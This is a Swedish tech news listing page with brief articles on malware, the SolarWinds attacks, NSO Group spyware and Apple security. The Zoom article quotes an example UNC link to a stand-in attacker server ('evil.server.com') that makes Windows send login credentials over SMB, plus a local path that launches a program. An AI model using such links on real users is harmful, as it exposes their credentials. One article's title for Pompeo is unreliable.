m

Apple fortsätter att jobba mot sideloading
Men är det för eller emot användaren?

Apple är i blåsväder, tillsammans med andra stora techbolag, på flera olika fronter. I USA ringer Tim Cook till Nancy Pelosi för att varna om hur dåligt det skulle vara om andra fick ha butiker på iPhone och i Europa är EU på krigsstigen med sitt Digital markets act, som bland annat inte gillar att Apple är ensam grindvakt i sina telefoner. I dag släppte Apple en rapport som starkt pratar för att sideloading är något som är uselt, framförallt för användarna. Enligt Apple så tittar EU alldeles för mycket på andra företags bästa och inte användarna. Den som vill säga emot kan säga precis samma sak, att Apple bara talar i egen sak och inte ser till användarnas bästa som, möjligen, hade varit att ha fler alternativ. Tumnagel
37.8°
+
Roger Åberg
0

Nytt malware förhindrar drabbade att besöka piratsajter
Vigilante skriver om datorns HOSTS-fil

Det brittiska säkerhetsföretaget Sophos har upptäckt ett nytt så kallat malware med ett lite udda syfte. Malwaret som kallas för "Vigilante" gör så att de som drabbats inte länge kan surfa till bittorrent-sajter som The Pirate Bay samt en lång rad andra torrent-tjänster med länkar till piratkopierat material. Vigilantes tillvägagångssätt för att blockera drabbade att besökare piratsajter är förhållandevis enkelt. Efter att en pc-dator infekterats så skriver Vigilante helt enkelt om datorns HOSTS-fil och pekar en lång rad webbadresser till ip-adressen 127.0.0.1, datorns så kallade "localhost". Den eventuella skada som Vigilante åstadkommer är ganska enkel att reparera. Det är bara för användare att öppna sin HOSTS-fil i en textredigerare och ta bort de rader som Vigilante lagt till. Vem som ligger bakom Vigilante finns det inga uppgifter om. Men vi kan väl utgå från att det är någon som inte gillar det piratsajterna pysslar med. Här nedan kan ni kolla in hur en HOSTS-fil ser ut efter att ha drabbats av Vigilante. Tumnagel
33.3°
+
Wille Wilhelmsson
0

Nu kan man generera kryptovaluta med Norton Antivirus
Om man vill att det ska slöa ner datorn ännu mer

Norton har bakat in en ny funktion i sin antivirusmjukvara Norton 360 med vilken användare kan generera kryptovalutan ethereum. Funktionen kallas för Norton Crypto och använder datorns GPU för att generera ethereum. Det är oklart om datorn gör detta helt på egen hand eller ansluter till en pool med andra som genererar ethereum. Det sistnämnda är dock sannolikt då en enskild dator antagligen inte har särskilt mycket att tillföra på egen hand när det handlar om att generera kryptovalutor. Att använda Norton Crypto för att generera kryptovaluta jämfört med vissa andra mjukvaror för detta kan enligt Norton vara säkrare. Detta då en del andra mjukvaror avsedda för kryptovalutor kan vara försedda med malware eller vara rena bedrägerier. Vidare så är Norton Crypto väldigt enkelt att använda enligt Norton då det är en del av en mjukvara som användaren kanske redan känner sig bekant med. En annan fördel med Norton Crypto, än en gång enligt Norton, är att kryptovalutan som genereras kan skickas automatiskt till en kryptoplånbok som Norton skapar och tillhandahålls åt användaren. Tumnagel
22.0°
+
Wille Wilhelmsson
0

SolarWinds-hackarna attackerar tusentals epostsystem
Microsoft varnar för nya attacker från hackergruppen Nobelium

Microsoft har gått ut med en varning där man uppger att den ryska hackergrupp som anses ligga bakom de så kallade SolarWinds-attackerna nu har börjat attackera system på nytt. Enligt Microsoft så ska hackergruppen Nobelium den här veckan ha försökt få tillgång till över 3000 epostsystem tillhörande diverse västerländska regeringar, organisationer för bland annat människorättsfrågor och olika tankekedjor. Majoriteten av attackerna som Microsoft upptäckt ska ha skett mot amerikanska intressen men man har även upptäckt andra västerländska mål som drabbats. Microsoft skriver i ett uttalande: "While organizations in the United States received the largest share of attacks, targeted victims span at least 24 countries. At least a quarter of the targeted organizations were involved in international development, humanitarian, and human rights work. Nobelium, originating from Russia, is the same actor behind the attacks on SolarWinds customers in 2020." Målet med att attackera epostsystemen verkar vara för att dessa ska kunna användas för att skicka ut epost som ser ut att komma från de som attackerats. Dessa epostmeddelande ska innehålla malwaret NativeZone som skulle ge kunna obehöriga tillgångar till bakdörrar till olika system. Detta skulle kunna ske om mottagarna av epostmeddelandena oavsiktligt klickar på länkar i epostmeddelandet som installerar NativeZone i deras system. Microsoft skriver att många av attackerna ska ha stoppats automatiskt av Windows Defender och att man nu håller på och underrättar de kunder som man tros ha blivit utsatta för de nya attackerna. Tumnagel
32.7°
+
Wille Wilhelmsson
0

USA straffar Ryssland för SolarWinds-attacken
Utvisar diplomater och inför nya ekonomiska sanktioner

USA:s president Joe Biden meddelade igår att USA kommer att utvisa tio ryska diplomater och införa nya ekonomiska sanktioner mot Ryssland som svar på den så kallade SolarWinds-attacken samt Rysslands försök att störa det amerikanska presidentvalet. Både FBI och NSA har tidigare pekat ut Ryssland som ansvarig för SolarWinds-attacken, det enorma datorintrånget som via malware drabbades tusentals företag och myndigheter över hela världen. Amerikanska säkerhetskällor har även fastställt att ryska intressen försökt påverka de amerikanska presidentvalen både 2016 och 2020. Förutom att utvisa de tio ryska diplomaterna så inför USA nu ett förbud för amerikanska banker att finansiera köp av obligationer från ryska staten, något som kommer att göra det svårare för Ryssland att få tillgång till internationell valuta. Dessutom beläggs sex ryska techföretag med sanktioner då de anses ha försett ryska säkerhetstjänster med olika typer av verktyg för cyberattacker. Tumnagel
64.3°
+
Wille Wilhelmsson
0

Apple-ingenjör kritiserar Apples app-granskning
“Like bringing a plastic butter knife to a gunfight”

Den stora rättegångsfejden mellan Apple och Epic Games kommer dra igång ordentligt i maj och innan festligheterna drar igång har båda företagen publicerat massvis med dokument som ska användas som bevisföring under rättegången. Patrick McGee från Financial Times har grottat ner sig i dokumenten och hittat lite grejer som pekar på att Apples granskningsprocess för nya appar kort sagt bristfällig. Så pass att Eric Friedman, chef för Apples Fraud Engineering Algorithms and Risk-enhet, liknat Apples skydd via granskningsprocessen med att dra fram en smörkniv i en eldstrid. Anekdoten kommer från Epic Games som fått citaten från interna dokument hos Apple och menar att den bristande säkerheten i granskningsprocessen inte riktigt gör att Apples app-skatt på 30 procent är motiverad. Apple hävdar starkt att de 30 procent av app-intäkter tas ut för att kunna fortsätta driva granskning av appar och skydda kunder från osäkra appar av olika slag. Med dokumenten menar Epic Games kort och gott att det inte finns några bevis på att Apple faktiskt skyddar användarna. Apple hävdar att granskningsprocessen för appar i App Store är robust och att App Store-är betydligt säkrare än motsvarande appbutiker på andra plattformar. Mer specifikt pekar Apple på data från 2018 som visar att malware på iPhone-plattformen endast bestått av 0,85 procent av alla malware-infektioner, medan malware på Android och Windows stått för 47,2 respektive 35,8 procent av spridningen Vidare menar Epic Games att Apples bristande granskning lett till att kopior av populära appar beviljats att läggas upp på App Store, vilket skadat originalappen. Bland annat citerar Epic Games chefen för meditationsappen Headspace att liknande appar dykt upp i App Store efter att Headspace blivit poppis som kort och gott är fejkappar. Mer specifikt har detta sagts: “Shockingly, Apple [is] approving these apps, and when the users buy the apps they are left with nothing but some scammy chat rooms in the background." Andra roliga fynd folk har gjort är bland annat att Apple varit på gång att utveckla iMessage till Android, men lagt ner projektet då man ansåg att det i slutändan endast skulle skada Apples varumärke. Rättegången kommer dra igång 3 maj och lär hålla på ett tag. Tumnagel
34.7°
+
André Stray
0

Apple släpper uppdatering till säkerhetslucka i WebKit
Till iPhone, iPads, Apple Watch och Mac

Apple släppte igår säkerhetsuppdateringar till flera av sina operativsystem efter det att det hittats en säkerhetslucka i Apples webbläsar-motor WebKit. Säkerhetsluckan ska ha gjort det möjligt för obehöriga att eventuellt installera malware på iPhones, iPads, Apple Watch och Mac-datorer om de använde Apples webbläsare Safari för att besöka webbsidor som var specifikt utformade för det ändamålet. Säkerhetsluckan ska ha rapporterats till Apple efter upptäckter från säkerhetsforskare på Google och Microsoft men sägs inte ha blivit utnyttjad vad Apple vet om. Kör ni iPhones, iPads, Apple Watch och/eller Mac-datorer så är det rekommenderat att ladda hem och installera iOS och iPadOS 14.4.1, watchOS 7.3.2 och/eller macOS Big Sur 11.2.3 och installera detta. Tumnagel
41.0°
+
Wille Wilhelmsson
0

Cyberpunk 2077-uppdatering skjuts upp till mars
Det går bra nu

CD Projekt RED har haft rätt omfattande planer att förbättra Cyberpunk 2077. Spelet släpptes i december, men det blev snabbt rätt tydligt att spelet skulle må betydligt bättre av att skjutas upp typ ett halvår. CD Projekts planer att fixa spelet har till stor del varit två rejäla patchar, samt ett gäng mindre hotfixes. Den första patchen släpptes i slutet av januari och fixade en skvätt buggar samt förbättrade prestandan. Uppdateringen skulle även agera grund för att underlätta för kommande uppdateringar. En andra patch skulle släppas nu i slutet av februari, men denna har nu försenats till andra halva av mars. I en rad Twitter-inlägg skriver CD Projekt RED att på grund av uppdateringens storlek och studions IT-struktur har det blivit svårt att färdigställa uppdateringen och det är helt enkelt inte möjligt att leverera uppdateringen i tid. Utvecklarna lovar dock att uppdateringen kommer erbjuda en stor mängd kvalitetsförbättringar och buggfixar, vilket är kalas. Bloomberg ger oss en lite tristare bild av vad som händer i CDPR-bygget och hacket utvecklarna utsattes för tidigare i år har satt sina spår. CDPR bad som känt busarna att dra åt fanders i stället för att betala någon lösensumma, men detta ledde till att utvecklarna som jobbat hemma har de senaste två veckorna varit utelåsta från sina arbetsstationer då de inte kunnat använda sin VPN. Vidare ska de anställdas datorer ha varit tvungna att undersökas av utvecklarnas IT-avdelning för att leta efter malware, vilket satt ytterligare käppar i hjulet för Cyberpunk 2077-uppdateringen. Tumnagel
30.0°
+
André Stray
0

Malware skrivet för Apples M1-chip har börjat dyka upp
Ökänt adware nu anpassat för Apple Silicon

Wired rapporterar att det redan har börjat dyka upp malware som är specialskrivet för att köras på Apple-datorer som är försedda med Apples egna ARM-chip Apple Silicon M1. Wired skriver att säkerhetsforskaren Patrick Wardle har hittat ett malware av typen adware, en programvara som kan bombardera användare med oönskade annonser. Adware kallas för GoSearch22 och ska tillhöra den ökända adware-familjen Pirrit som infekterat Mac-datorer i åratal. Säkerhetsforskaren Thomas Reed från Malwarebytes Mac säger om upptäckten av att det nu finns malware specialskrivet för Apple Silicon: "It definitely was inevitable—compiling for M1 can be as easy as flicking a switch in the project settings. And honestly, I’m not at all surprised by the fact that it happened in Pirrit first. That’s one of the most active Mac adware families, and one of the oldest, and they’re constantly changing to evade detection." Det nu upptäckta adwaret GoSearch22 lägger till sig som ett tillägg (extension) i Apples webbläsare Safari och börjar därefter visa annonser vilka de som utvecklat adwaret tjänar pengar på. Skulle du själv ha drabbats så finns instruktioner för hur GoSearch22 avinstalleras här. Tumnagel
37.2°
+
Wille Wilhelmsson
0

Apple tar bort funktion som lät appar skippa brandväggar
Buggar i Apples egna appar ska nu vara fixade

I höstas upptäckte ett gäng med säkerhetsforskare att 53 stycken av Apples egna appar kunde ta sig ut på nätet utan att ta hänsyn varken till brandväggar eller VPN-kopplingar i macOS 11 Big Sur. Detta berodde enligt Apple själva på att det fanns en del buggar i en del av deras appar och därför hade man skapat en lista, "ContentFilterExclusionList", med appar som kunde passera datorns brandväggar och ta andra vägar än eventuella VPN-kopplingar föreskrev. Säkerhetsforskare påpekade att det här i värsta fall skulle kunna leda till att malware som smugits in i Apples egna appar eller på något sätt utgav sig för att vara någon av dessa skulle kunna få fritt fram att härja i användarnas datorer. Apple uppgav redan i höstas att man planerade att ta bort ContentFilterExclusionList och i macOS Big Sur 11.2 beta 2 ska så ha skett rapporterar ZDNet. Det här innebär att när macOS Big Sur 11.2 släpps till allmänheten kommer all trafik från datorn appar, oavsett om de kommer från Apple eller någon annan, ta hänsyn till eventuella brandväggar och VPN-kopplingar på datorn. Tumnagel
42.4°
+
Wille Wilhelmsson
0

Ryssland låg bakom SolarWinds-attacken enligt FBI och NSA
Hacking-attacken som drabbat tusentals företag och myndigheter

De amerikanska myndigheterna NSA, FBI, Cybersecurity and Infrastructure Security Agency samt Office of the Director of National Intelligence uppger nu i ett gemensamt uttalande att det sannolikt är Ryssland som ligger bakom den så kallade SolarWinds-attacken, en attack som skedde efter att malware smugits in i mjukvara från det amerikanska företaget SolarWinds. Attacken tros ha skapat bakdörrar som gett obehöriga tillgång till system tillhörande åtminstone 18.000 myndigheter, organisationer och företag. USA:s försvarsminister Mike Pompeo var tidigt ute och pekade ut ryska intressen som ansvariga för attacken, något som USA:s president Donald Trump dock inte var villig att hålla med om. Nu bekräftar dock de fyra amerikanska säkerhetsmyndigheterna att det mesta pekar på att det är Ryssland som är ansvariga för attacken. I sitt uttalande skriver de bland annat: "This work indicates that an Advanced Persistent Threat (APT) actor, likely Russian in origin, is responsible for most or all of the recently discovered, ongoing cyber compromises of both government and non-governmental networks. At this time, we believe this was, and continues to be, an intelligence gathering effort. We are taking all necessary steps to understand the full scope of this campaign and respond accordingly." Exakt hur många företag och myndigheter som drabbats av attacken håller fortfarande på att utredas. Det är även oklart i vilken mån obehöriga fått tillgång till de drabbades system såväl som vilken data som kan ha läckt ut eller i värsta fall raderats från systemen. Tumnagel
32.7°
+
Wille Wilhelmsson
0

SolarWinds-hackare kom åt Microsoft-källkod
Ska dock inte vara någon säkerhetsrisk

För någon vecka sedan rapporterade vi att tusentals myndigheter, organisationer och företag runt om i världen hade fått bakdörrar installerade i sina datorsystem under 2020. Det var ett slags malware som smugits in av någon obehörig i nätverksprogramvaran Orion från den amerikanska mjukvarutillverkaren SolarWinds. Denna illvilliga kod gav obehöriga tillgång till SolarWinds kunders egna system via bakdörrar. En av dem som drabbades var Microsoft som nu meddelade att dessa hackers lyckades komma åt källkod. Microsoft var dock tydliga med att säga att de endast kunde läsa källkoden och inte ändra den. De nämnde också att källkoden inte innehåller någon kod som är kopplad till säkerhet och integritet vilket, enligt Microsoft, innebär att det inte finns några säkerhetsrisker nu när delar av deras källkod hamnat på vift. Tumnagel
35.5°
+
Frode Wikesjö
0
2020

Microsoft, Google och andra vill också bekämpa NSO Group
Spyware-företaget som Facebook har stämt

En sammanslutning bestående av Microsoft, Google, Cisco, WMVare och Internet Association ansluter sig nu till Facebooks juridiska strid mot det israeliska spyware-företaget NSO Group. Facebook stämde tidigare i år NSO Group då deras spyware-verktyg Pegasus använts för att hacka Facebooks meddelandetjänst WhatsApp. NSO Group försöker få en amerikansk domstol att lägga ner fallet då man anser att man bör ha immunitet mot sådana juridiska tvister då man bara säljer sina programvaror direkt till myndigheter i olika stater, stater som inte sällan använder NSO:s mjukvara för att övervaka både sina egna och andra länders medborgare. I ett blogginlägg med titeln "Cyber Mercenaries Don’t Deserve Immunity" förklarar Microsoft varför de tillsammans med de andra företagen inte anser att NSO bör åtnjuta någon juridisk immunitet och skriver bland annat: "We believe the NSO Group’s business model is dangerous and that such immunity would enable it and other PSOAs [private-sector offensive actors] to continue their dangerous business without legal rules, responsibilities or repercussions." Microsoft skriver även i blogginlägget att stater som utvecklar egen mjukvara liknande den NSO Group säljer alltid måste ha sina diplomatiska relationer med andra länder i åtanke om man ska använda sådana verktyg, något som NSO Group helt kan bortse från. Vidare granskas inte hacking-verktygen som NSO utvecklar på samma sätt som de, antagligen, skulle göra om de var utvecklade direkt av olika länders säkerhetsorganisationer. Microsoft och de andra företagen anser även att NSO:s verktyg är ett hot mot mänskliga rättigheter då de bevisligen använts för att övervaka journalister och människorättsaktivister av olika stater som köpt in verktygen. Detta var något vi skrev om så sent som idag och vi har tidigare skrivit om NSO:s spyware-verktyg Chrysaor som användes för att hacka Android-telefoner 2017. Tumnagel
50.2°
+
Wille Wilhelmsson
0

Flera svenska storföretag drabbat av stor hackerattack
Ryssland pekas ut som ansvarig för SolarWinds-malware

Den senaste veckan har det rullats upp en stor härva där tusentals myndigheter, organisationer och företag runt om i världen ser ut att få bakdörrar installerade i sina datorsystem under året som gått. Det ska handla om ett malware som smugits in av någon obehörig i nätverks-programvaran Orion från den amerikanska mjukvarutillverkaren SolarWinds. Malwaret ska sedan ha gett obehöriga tillgång till SolarWinds kunders egna system via bakdörrar som lades in när en uppdatering till Orion skickades ut av SolarWinds. Runt 33.000 av SolarWinds kunder använder Orion och av dessa ska runt 18.000 ha installerat den aktuella uppdateringen av programvaran. En lång rad amerikanska myndigheter och företag ska ha drabbats av malware så väl som flera svenska företag. SVT skriver att bland andra svenska Rymdstyrelsen, Volvo, Skanska och Ericsson ska ha använt Orion. Det är än så länge oklart om eller i vilken omfattning bakdörrarna i de tusentals kundernas system ska ha utnyttjats av obehöriga. USA:s utrikesminister Mike Pompeo samt flera amerikanska säkerhetsorganisationer och säkerhetsföretag har pekat ut ryska intressen som ansvariga för SolarWinds-attacken. USA:s president Donald Trump, som oftast har haft väldigt svårt för att kritisera Ryssland för någonting, har dock försökt tona ner detta och har istället sagt att det kanske är Kina som är ansvariga för attacken. Tumnagel
23.6°
+
Wille Wilhelmsson
0

Apples egna appar skippar brandväggar och VPN i Big Sur
Oklart varför

Förra veckan släppte Apple macOS 11 Big Sur och då uppmärksammades det återigen att ett 50-tal av Apples egna appar kan koppla upp sig mot nätet utan att passera eventuella brandväggar eller VPN-applikationer som användaren har installerat på sin dator. Detta var något som uppmärksammades redan när Apple släppte betan av macOS Big Sur, något som de som rapporterade om detta då hoppades att Apple skulle ha fixat till i den skarpa versionen av Big Sur. Som flera användare av Big Sur påpekat kan det här leda till problem om någon lyckas utnyttja Apples egna appar för att till exempel ladda hem malware eller andra tråkigheter till datorn. Det kanske även kan kännas lite obekvämt för dem som använder VPN-uppkopplingar för att dölja var de befinner sig. Exakt varför Apple har valt att låta sina egna appar hoppa över brandväggar och VPN:er på datorn är inget som företaget än så länge har uppgett. Det spekuleras om att det kan vara något som Apple gör för att förhindra att deras egna program buggar ur på grund av felaktigt konfigurerade brandväggar, något som inte är helt ovanligt. De användare som rapporterat om problemet anser hur som helst att Apple borde låta användaren själv bestämma om Apples egna appar ska kunna koppla upp sig mot nätet direkt eller om de ska gå igenom de brandväggar och VPN:er som installerats på datorn. Tumnagel
11.7°
+
Wille Wilhelmsson
0

Apple reder ut övervakningsmisstankar
Gatekeeper används för att skydda användarna

När Apple släppte macOS 11 Big Sur förra veckan var det en del som uppmärksammade att deras datorer försökte kontakta Apples servrar varje gång de körde igång ett program på datorn. Detta fick en del att misstänk att Apple övervakade vad användarna gjorde med sina datorer. Nu har Apple uppdaterat ett av sina support-dokument och förklarar att det inte handlar om någon övervakning utan att det hela är en del av deras så kallade Gatekeeper-funktion. Gatekeeper pingar Apples servrar när någon försöker öppna ett program på Mac-datorer för att kontrollera om programmet som försöker öppnas är känt för att innehålla malware eller andra tråkigheter som användaren knappast vill ha på sin dator. Apple skriver själva om Gatekeeper-funktionen. "Gatekeeper performs online checks to verify if an app contains known malware and whether the developer’s signing certificate is revoked. We have never combined data from these checks with information about Apple users or their devices. We do not use data from these checks to learn what individual users are launching or running on their devices." Skulle en användare vilja köra ett program som Gatekeeper varnar för så går det oftast att göra det genom att ändra i datorns inställningar, något som säkert många Mac-användare antagligen redan är medvetna om. Apple uppger vidare att man framöver även kommer att låta användare att helt skippa Gatekeepers säkerhetskontroll om de känner för det, något som kanske inte är att rekommendera för dem som inte har så bra koll på vad de pysslar med på sina datorer. Apple skriver: In addition, over the the next year we will introduce several changes to our security checks: * A new encrypted protocol for Developer ID certificate revocation checks * Strong protections against server failure * A new preference for users to opt out of these security protections Att Apple nämner "Strong protections against server failure" beror antagligen på att det verkar vara detta som fallerade när miljontals användare valde att installera macOS Big Sur och sedan körde igång program på sina datorer vilka skulle kontrolleras av Gatekeeper. Hade kontrollen gått lika smidigt som den vanligtvis gör så hade det här antagligen inte ens uppmärksammats. Tumnagel
38.6°
+
Wille Wilhelmsson
0

USA åtalar ryska militärer för cyberattacker runt om i världen
Kan få skaka galler länge om de grips

Det amerikanska rättsväsendet åtalar nu sex stycken officerare tillhörande den ryska säkerhetstjänsten GRU för att ha legat bakom en lång rad cyberattacker och datorintrång runt om i världen. De sex åtalas bland annat för att genomfört dessa attacker mot Ukraina, Georgien, Vinter-OS i sydkoreanska PyeongChang samt attacker mot det franska valet. En åklagare vid United States District Court for the Western District of Pennsylvania har utfärdat en arresteringsorder mot de sex ryska officerarna och säger i ett uttalande: "The defendantsx27 and their co-conspirators caused damage and disruption to computer networks worldwide, including in France, Georgia, the Netherlands, Republic of Korea, Ukraine, the United Kingdom, and the United States." Cyberattackerna som de sex nu åtalas för ska ha pågått mellan 2015 - 2019 och åklagaren fortsätter: "Their computer attacks used some of the world’s most destructive malware to date, including: KillDisk and Industroyer, which each caused blackouts in Ukraine; NotPetya, which caused nearly $1 billion in losses to the three victims identified in the indictment alone; and Olympic Destroyer, which disrupted thousands of computers used to support the 2018 PyeongChang Winter Olympics." De sex GRU-officerarna Yuriy Sergeyevich Andrienko, 32; Sergey Vladimirovich Detistov, 35; Pavel Valeryevich Frolov, 28; Anatoliy Sergeyevich Kovalev, 29; Artem Valeryevich Ochichenko, 27 samt Petr Nikolayevich Pliskin, 32 riskerar upp till 27 års fängelse i USA om de skulle gripas och dömas för de brott de nu anklagas för i USA. Samtliga av de sex åtalade tros befinna sig i Ryssland och lär sannolikt inte bli utlämnade till USA Tumnagel
47.4°
+
Wille Wilhelmsson
0

Facebooks tvist mot NSO fortsätter
Övervakningsföretag kan inte gömma sig bakom sitt planerade försvar

En domare i Kalifornien beslutade igår att Facebooks stämning mot det israeliska spyware-företaget NSO Group kan fortsätta. Det får ses som ett stort bakslag för NSO som hade hoppats på att målet skulle läggas ner. NSO Group anklagas för att ha hackat Facebooks meddelandetjänst WhatsApp i syfte för att övervaka användare där åt någon av sina okända kunder. NSO ansåg att målet skulle läggas ner då deras kunder är suveräna stater som inte kan åtalas i amerikansk domstol, något som företaget ansåg även skulle gälla dem. Detta ansåg dock inte domaren i Kalifornien och därför kan Facebooks juridiska tvist mot NSO nu fortsätta. NSO Group säljer övervakningsprogramvara till en lång rad stater som använder denna i mer eller mindre nogräknade syften för att övervaka datatrafik. NSO hävdar oftast själva att deras tjänster används för att bekämpa brott och terrorism. Det finns dock tecken på att flera av NSO:s kunder använder deras tjänster för att övervaka människorättsaktivister, journalister, politiker och andra personer som vissa stater kan anse vara "besvärliga". Det finns ingen komplett lista över vilka länder som är kunder till NSO Group men deras spyware-programvara Pegasus sägs användas av minst 45 länder enligt The Citizenlab på Toronto University. Tumnagel
43.8°
+
Wille Wilhelmsson
0

Google förbjuder annonser för stalkerware och spyware
Annonser för övervakningsappar portas från Googles annonsprogram

Google har uppdaterat policyn för vad företag och andra får annonsera om på Google och nu förbjuder Google annonser för så kallat "stalkerware" och "spyware". Det innebär att det inte längre kommer att gå att annonsera för appar, produkter eller tjänster som är designade för att övervaka personer utan att dessa vet om det. Google skriver om den uppdaterade policyn för annonsprogrammet: Examples of products and services that will be prohibited (non-exhaustive) Spyware and technology used for intimate partner surveillance including but not limited to spyware/malware that can be used to monitor texts, phone calls, or browsing history; GPS trackers specifically marketed to spy or track someone without their consent; promotion of surveillance equipment (cameras, audio recorders, dash cams, nanny cams) marketed with the express purpose of spying. Google säger dock att produkter, appar eller tjänster som specifikt är designade för att låta föräldrar hålla koll på sina barn och produkter som riktar sig till licensierade privatdetektiver fortsatt kommer att tillåtas i annonser på Google. Googles uppdaterade policy kommer att börja gälla från 11 augusti. Tumnagel
47.2°
+
Wille Wilhelmsson
0

Intels processorer får inbyggt skydd mot malware
Tiger Lake blir Intels första processor med CET

Ars Technica rapporterar att Intel kommer att börja bygga in skydd får så kallat malware i en del av sina framtida processorer. För att åstadkomma detta så kommer Intel att börja applicera en teknik som kallas för Control-Flow Enforcement Technology (CET) vilken Intel har utvecklat tillsammans med Microsoft sedan 2016. Art Technica skriver om CET: "Control-Flow Enforcement Technology, or CET, represents a fundamental change in the way processors execute instructions from applications such as Web browsers, email clients, or PDF readers. Jointly developed by Intel and Microsoft, CET is designed to thwart a technique known as return-oriented programming, which hackers use to bypass anti-exploit measures software developers introduced about a decade ago.These defenses were designed to significantly lessen the damage software exploits could inflict by introducing changes to system memory that prevented the execution of malicious code. Even when successfully targeting a buffer overflow or other vulnerability, the exploit resulted only in a system or application crash, rather than a fatal system compromise." Intels första processor som kommer att få CET inbyggt är en kommande processor som går under namnet "Tiger Lake", en processor som även driver Intels experimentella Horseshoe Bend-laptop med en jättestor böjbar skärm som vi skrev om tidigare i år. Tumnagel
39.3°
+
Wille Wilhelmsson
0

Epic Games släpper Fortnite på Play Store
Lite lättare att lägga vantarna på spelet

Fortnite har funnits till mobiler sedan ett par år tillbaka, men på grund av höga avgifter har Epic Games valt att undvika att lägga upp spelet på Google Play Store. Mer specifikt vill Google ha 30 procent av intäkterna från in-game-köp i Fortnite, vilket Epic Games inte känt varit rättvist och har i stället erbjudit mobilversionen av spelet via deras hemsida. Nu verkar Epic Games ha krupit till korset och har släppt Fortnite på Play Store ändå. I samband med detta har Epic Games levererat ett uttalande där de skriver att Google sätter käppar i hjulet för mjukvara som inte finns tillgänglig på Play Store: Google puts software downloadable outside of Google Play at a disadvantage, through technical and business measures such as scary, repetitive security pop-ups for downloaded and updated software, restrictive manufacturer and carrier agreements and dealings, Google public relations characterizing third party software sources as malware, and new efforts such as Google Play Protect to outright block software obtained outside the Google Play store. Hur som helst. Fortnite kommer från och med nu finnas tillgängligt via Play Store. Länk till spelet har ni här nere till vänster. Tumnagel
36.0°
+
André Stray
0

Cloudflare lanserar föräldrakontroll via DNS
Spärra vuxengrejer direkt i DNS:en med 1.1.1.1 For Families

Skulle man enkelt vilja minska förekomsten av porrfilm och andra vuxenrelaterade saker i sitt hushåll så lanserar nu Cloudflare tjänsten "1.1.1.1 for Families" vilken säger sig kunna blockera sådant. "1.1.1.1 for Families" är en förlängning av Cloudflares DNS-tjänst 1.1.1.1, en tjänst som säkerställer att operatörer eller företag inte kan registrera vilka webbsajter någon besöker via DNS-anropet. Med "1.1.1.1 for Families" utökas denna tjänst till att även blockera webbsajter på DNS-nivå om Cloudflare anser att dessa innehåller vuxenmaterial eller sprider malware. Föräldrar som använder "1.1.1.1 for Families" kan välja att spärra enbart vuxenmaterial i barnens datorer eller både sådant och malware. Ni hittar DNS-inställningarna för detta i faktarutan här nedanför. Tumnagel
44.2°
+
Wille Wilhelmsson
0

Bugg kan lura av Zoom-användare inloggningsuppgifter
Om de råkar klicka på "elaka" länkar

Bleeping Computer rapporterar att videochatt-tjänsten Zoom har en ganska otrevlig bugg som gör att Windows-användare i värsta fall kan lämna över sina inloggnignsuppgifter till någon obehörig. Buggen består i att Zooms tillhörande chatt-tjänst gör om vissa saker som skickas i chatten till klickbara länkar. Tanken verkar vara att om någon till exempel skriver feber.se i ett chattfönster så ska detta automatiskt konverteras till länken feber.se så att detta blir klickbart. Problemet är Zoom även konverterar sökvägar till Windows så kallade UNC (Universal Naming Convention) till länkar. Det handlar om länkar som till exempel kan se ut så här: "\\evil.server.com\images\cat.jpg". När någon klickar på en sådan länk kommer Windows-maskiner att försöka ansluta till den aktuella servern via SMB-protokollet och då automatiskt skicka över användaren inloggnings-uppgifter. Dessa ska sedan vara hyfsat enkla att dekryptera för mottagaren som eventuellt fångar upp anropet enligt Bleeping Computer. Förutom det så skulle någon även kunna få Windows-användare att kicka igång olika program på datorn genom att klicka på länkar i zoom. "\\127.0.0.1\C$\windows\system32\calc.exe" skulle till exempel starta datorns miniräknare. Det ska observeras att användaren först kommer att tillfrågas om det aktuella programmet ska öppnas. För att komma till rätta med det här problemet föreslår Bleeping Computer att Zoom fixar buggen på sin sida så snabbt som möjligt. Det finns även en workaround som förhindrar att UNC-anrop skickar inloggningsuppgifter automatiskt. Ni hittar den på länken nedan men det är en lösning som jag enbart rekommenderar för någorlunda erfarna Windows-användare (typ ni som har orkat läsa ända hit). Vi andra ska nog mest hålla koll på hur länkarna vi klickar på i Zoom faktiskt ser ut tills Zoom fixar den här buggen. Tumnagel
33.7°
+
Wille Wilhelmsson
0

Kritisk säkerhetslucka upptäckt i Windows
Har redan börjat utnyttjas av hackers

Microsoft meddelade igår att man har upptäckt en kritisk säkerhetslucka i Windows som kan låta en obehörig installera malware eller ransomware på den drabbade datorn. Det är när användare förhandsgranskar olika dokument med hjälp av "Adobe Type Manager Library" som en obehörig kan baka in kod i dessa dokument som installerar malware. Adobe Type Manager Library är en hjälpfunktion till Windows som ser till att typsnitt renderas som de ska i olika dokument. Den nu aktuella säkerhetsluckan ska finnas i samtliga Windows-versioner som Microsoft fortfarande stödjer och det finns än så länge ingen buggfix som täpper till säkerhetshålet. Microsoft uppger att säkerhetsluckan redan börjat utnyttjas av "hackers" men än så länge ska det inte ha skett i någon större omfattning enligt företaget. Microsoft lär sannolikt släppa en buggfix inom kort men vill man vara säker på att inte drabbas av säkerhetsluckan så kan man tills vidare stänga av "Preview Pane" och "Details Pane" i Windows Explorer. Hur man stänger av och sätter på det syns i videoklippet här nedanför. Tumnagel
33.4°
+
Wille Wilhelmsson
0

Säkerhetsprogram börjar blockera tredjepartsappar
Google Advanced Protection Program skyddar användare från malware

Google har uppdaterat sitt så kallade "Advanced Protection Program" så att detta nu även förhindrar användare att ladda ner och installera appar från annat än godkända appbutiker, vanligtvis Google Play. Advanced Protection Program är en tjänst som Google erbjuder de användare som efterfrågar lite extra säkerhet på grund av att de kanske kan anses löpa större risk än andra att hackas. Skyddet riktade sig initialt till politiker, företagsledare och andra kändisar men är tillgängligt för alla som är intresserade. I den uppdaterade versionen av Google Advanced Protection Program kommer Google Plays malware-skydd att aktiveras automatiskt på telefonerna så att dessa kontinuerligt scannas för att skyddas från skadlig programvara. Förutom det så kommer det som sagt inte att bli möjligt att ladda ner applikationer som inte finns i godkända appbutiker. Tredjeparts-appar som redan finns på telefonen kommer dock inte att raderas och kommer att fortsätta att uppdateras som vanligt. Att det inte längre går att installera tredjeparts-appar på Android-telefoner vars användare är anslutna till "Google Advanced Protection Program" förhindrar att användarna ladda hem till exempel appar fyllda med malware från okända källor. Det kan dock ställa till problem för företagsanvändare som använder företagsspecifika appar som inte går att hämta hem från Google Play eller någon annan godkänd appbutik. Tumnagel
40.3°
+
Wille Wilhelmsson
0

Microsoft har stört ut globalt botnät
Botnätet Necurs kontrollerade 9 miljoner datorer

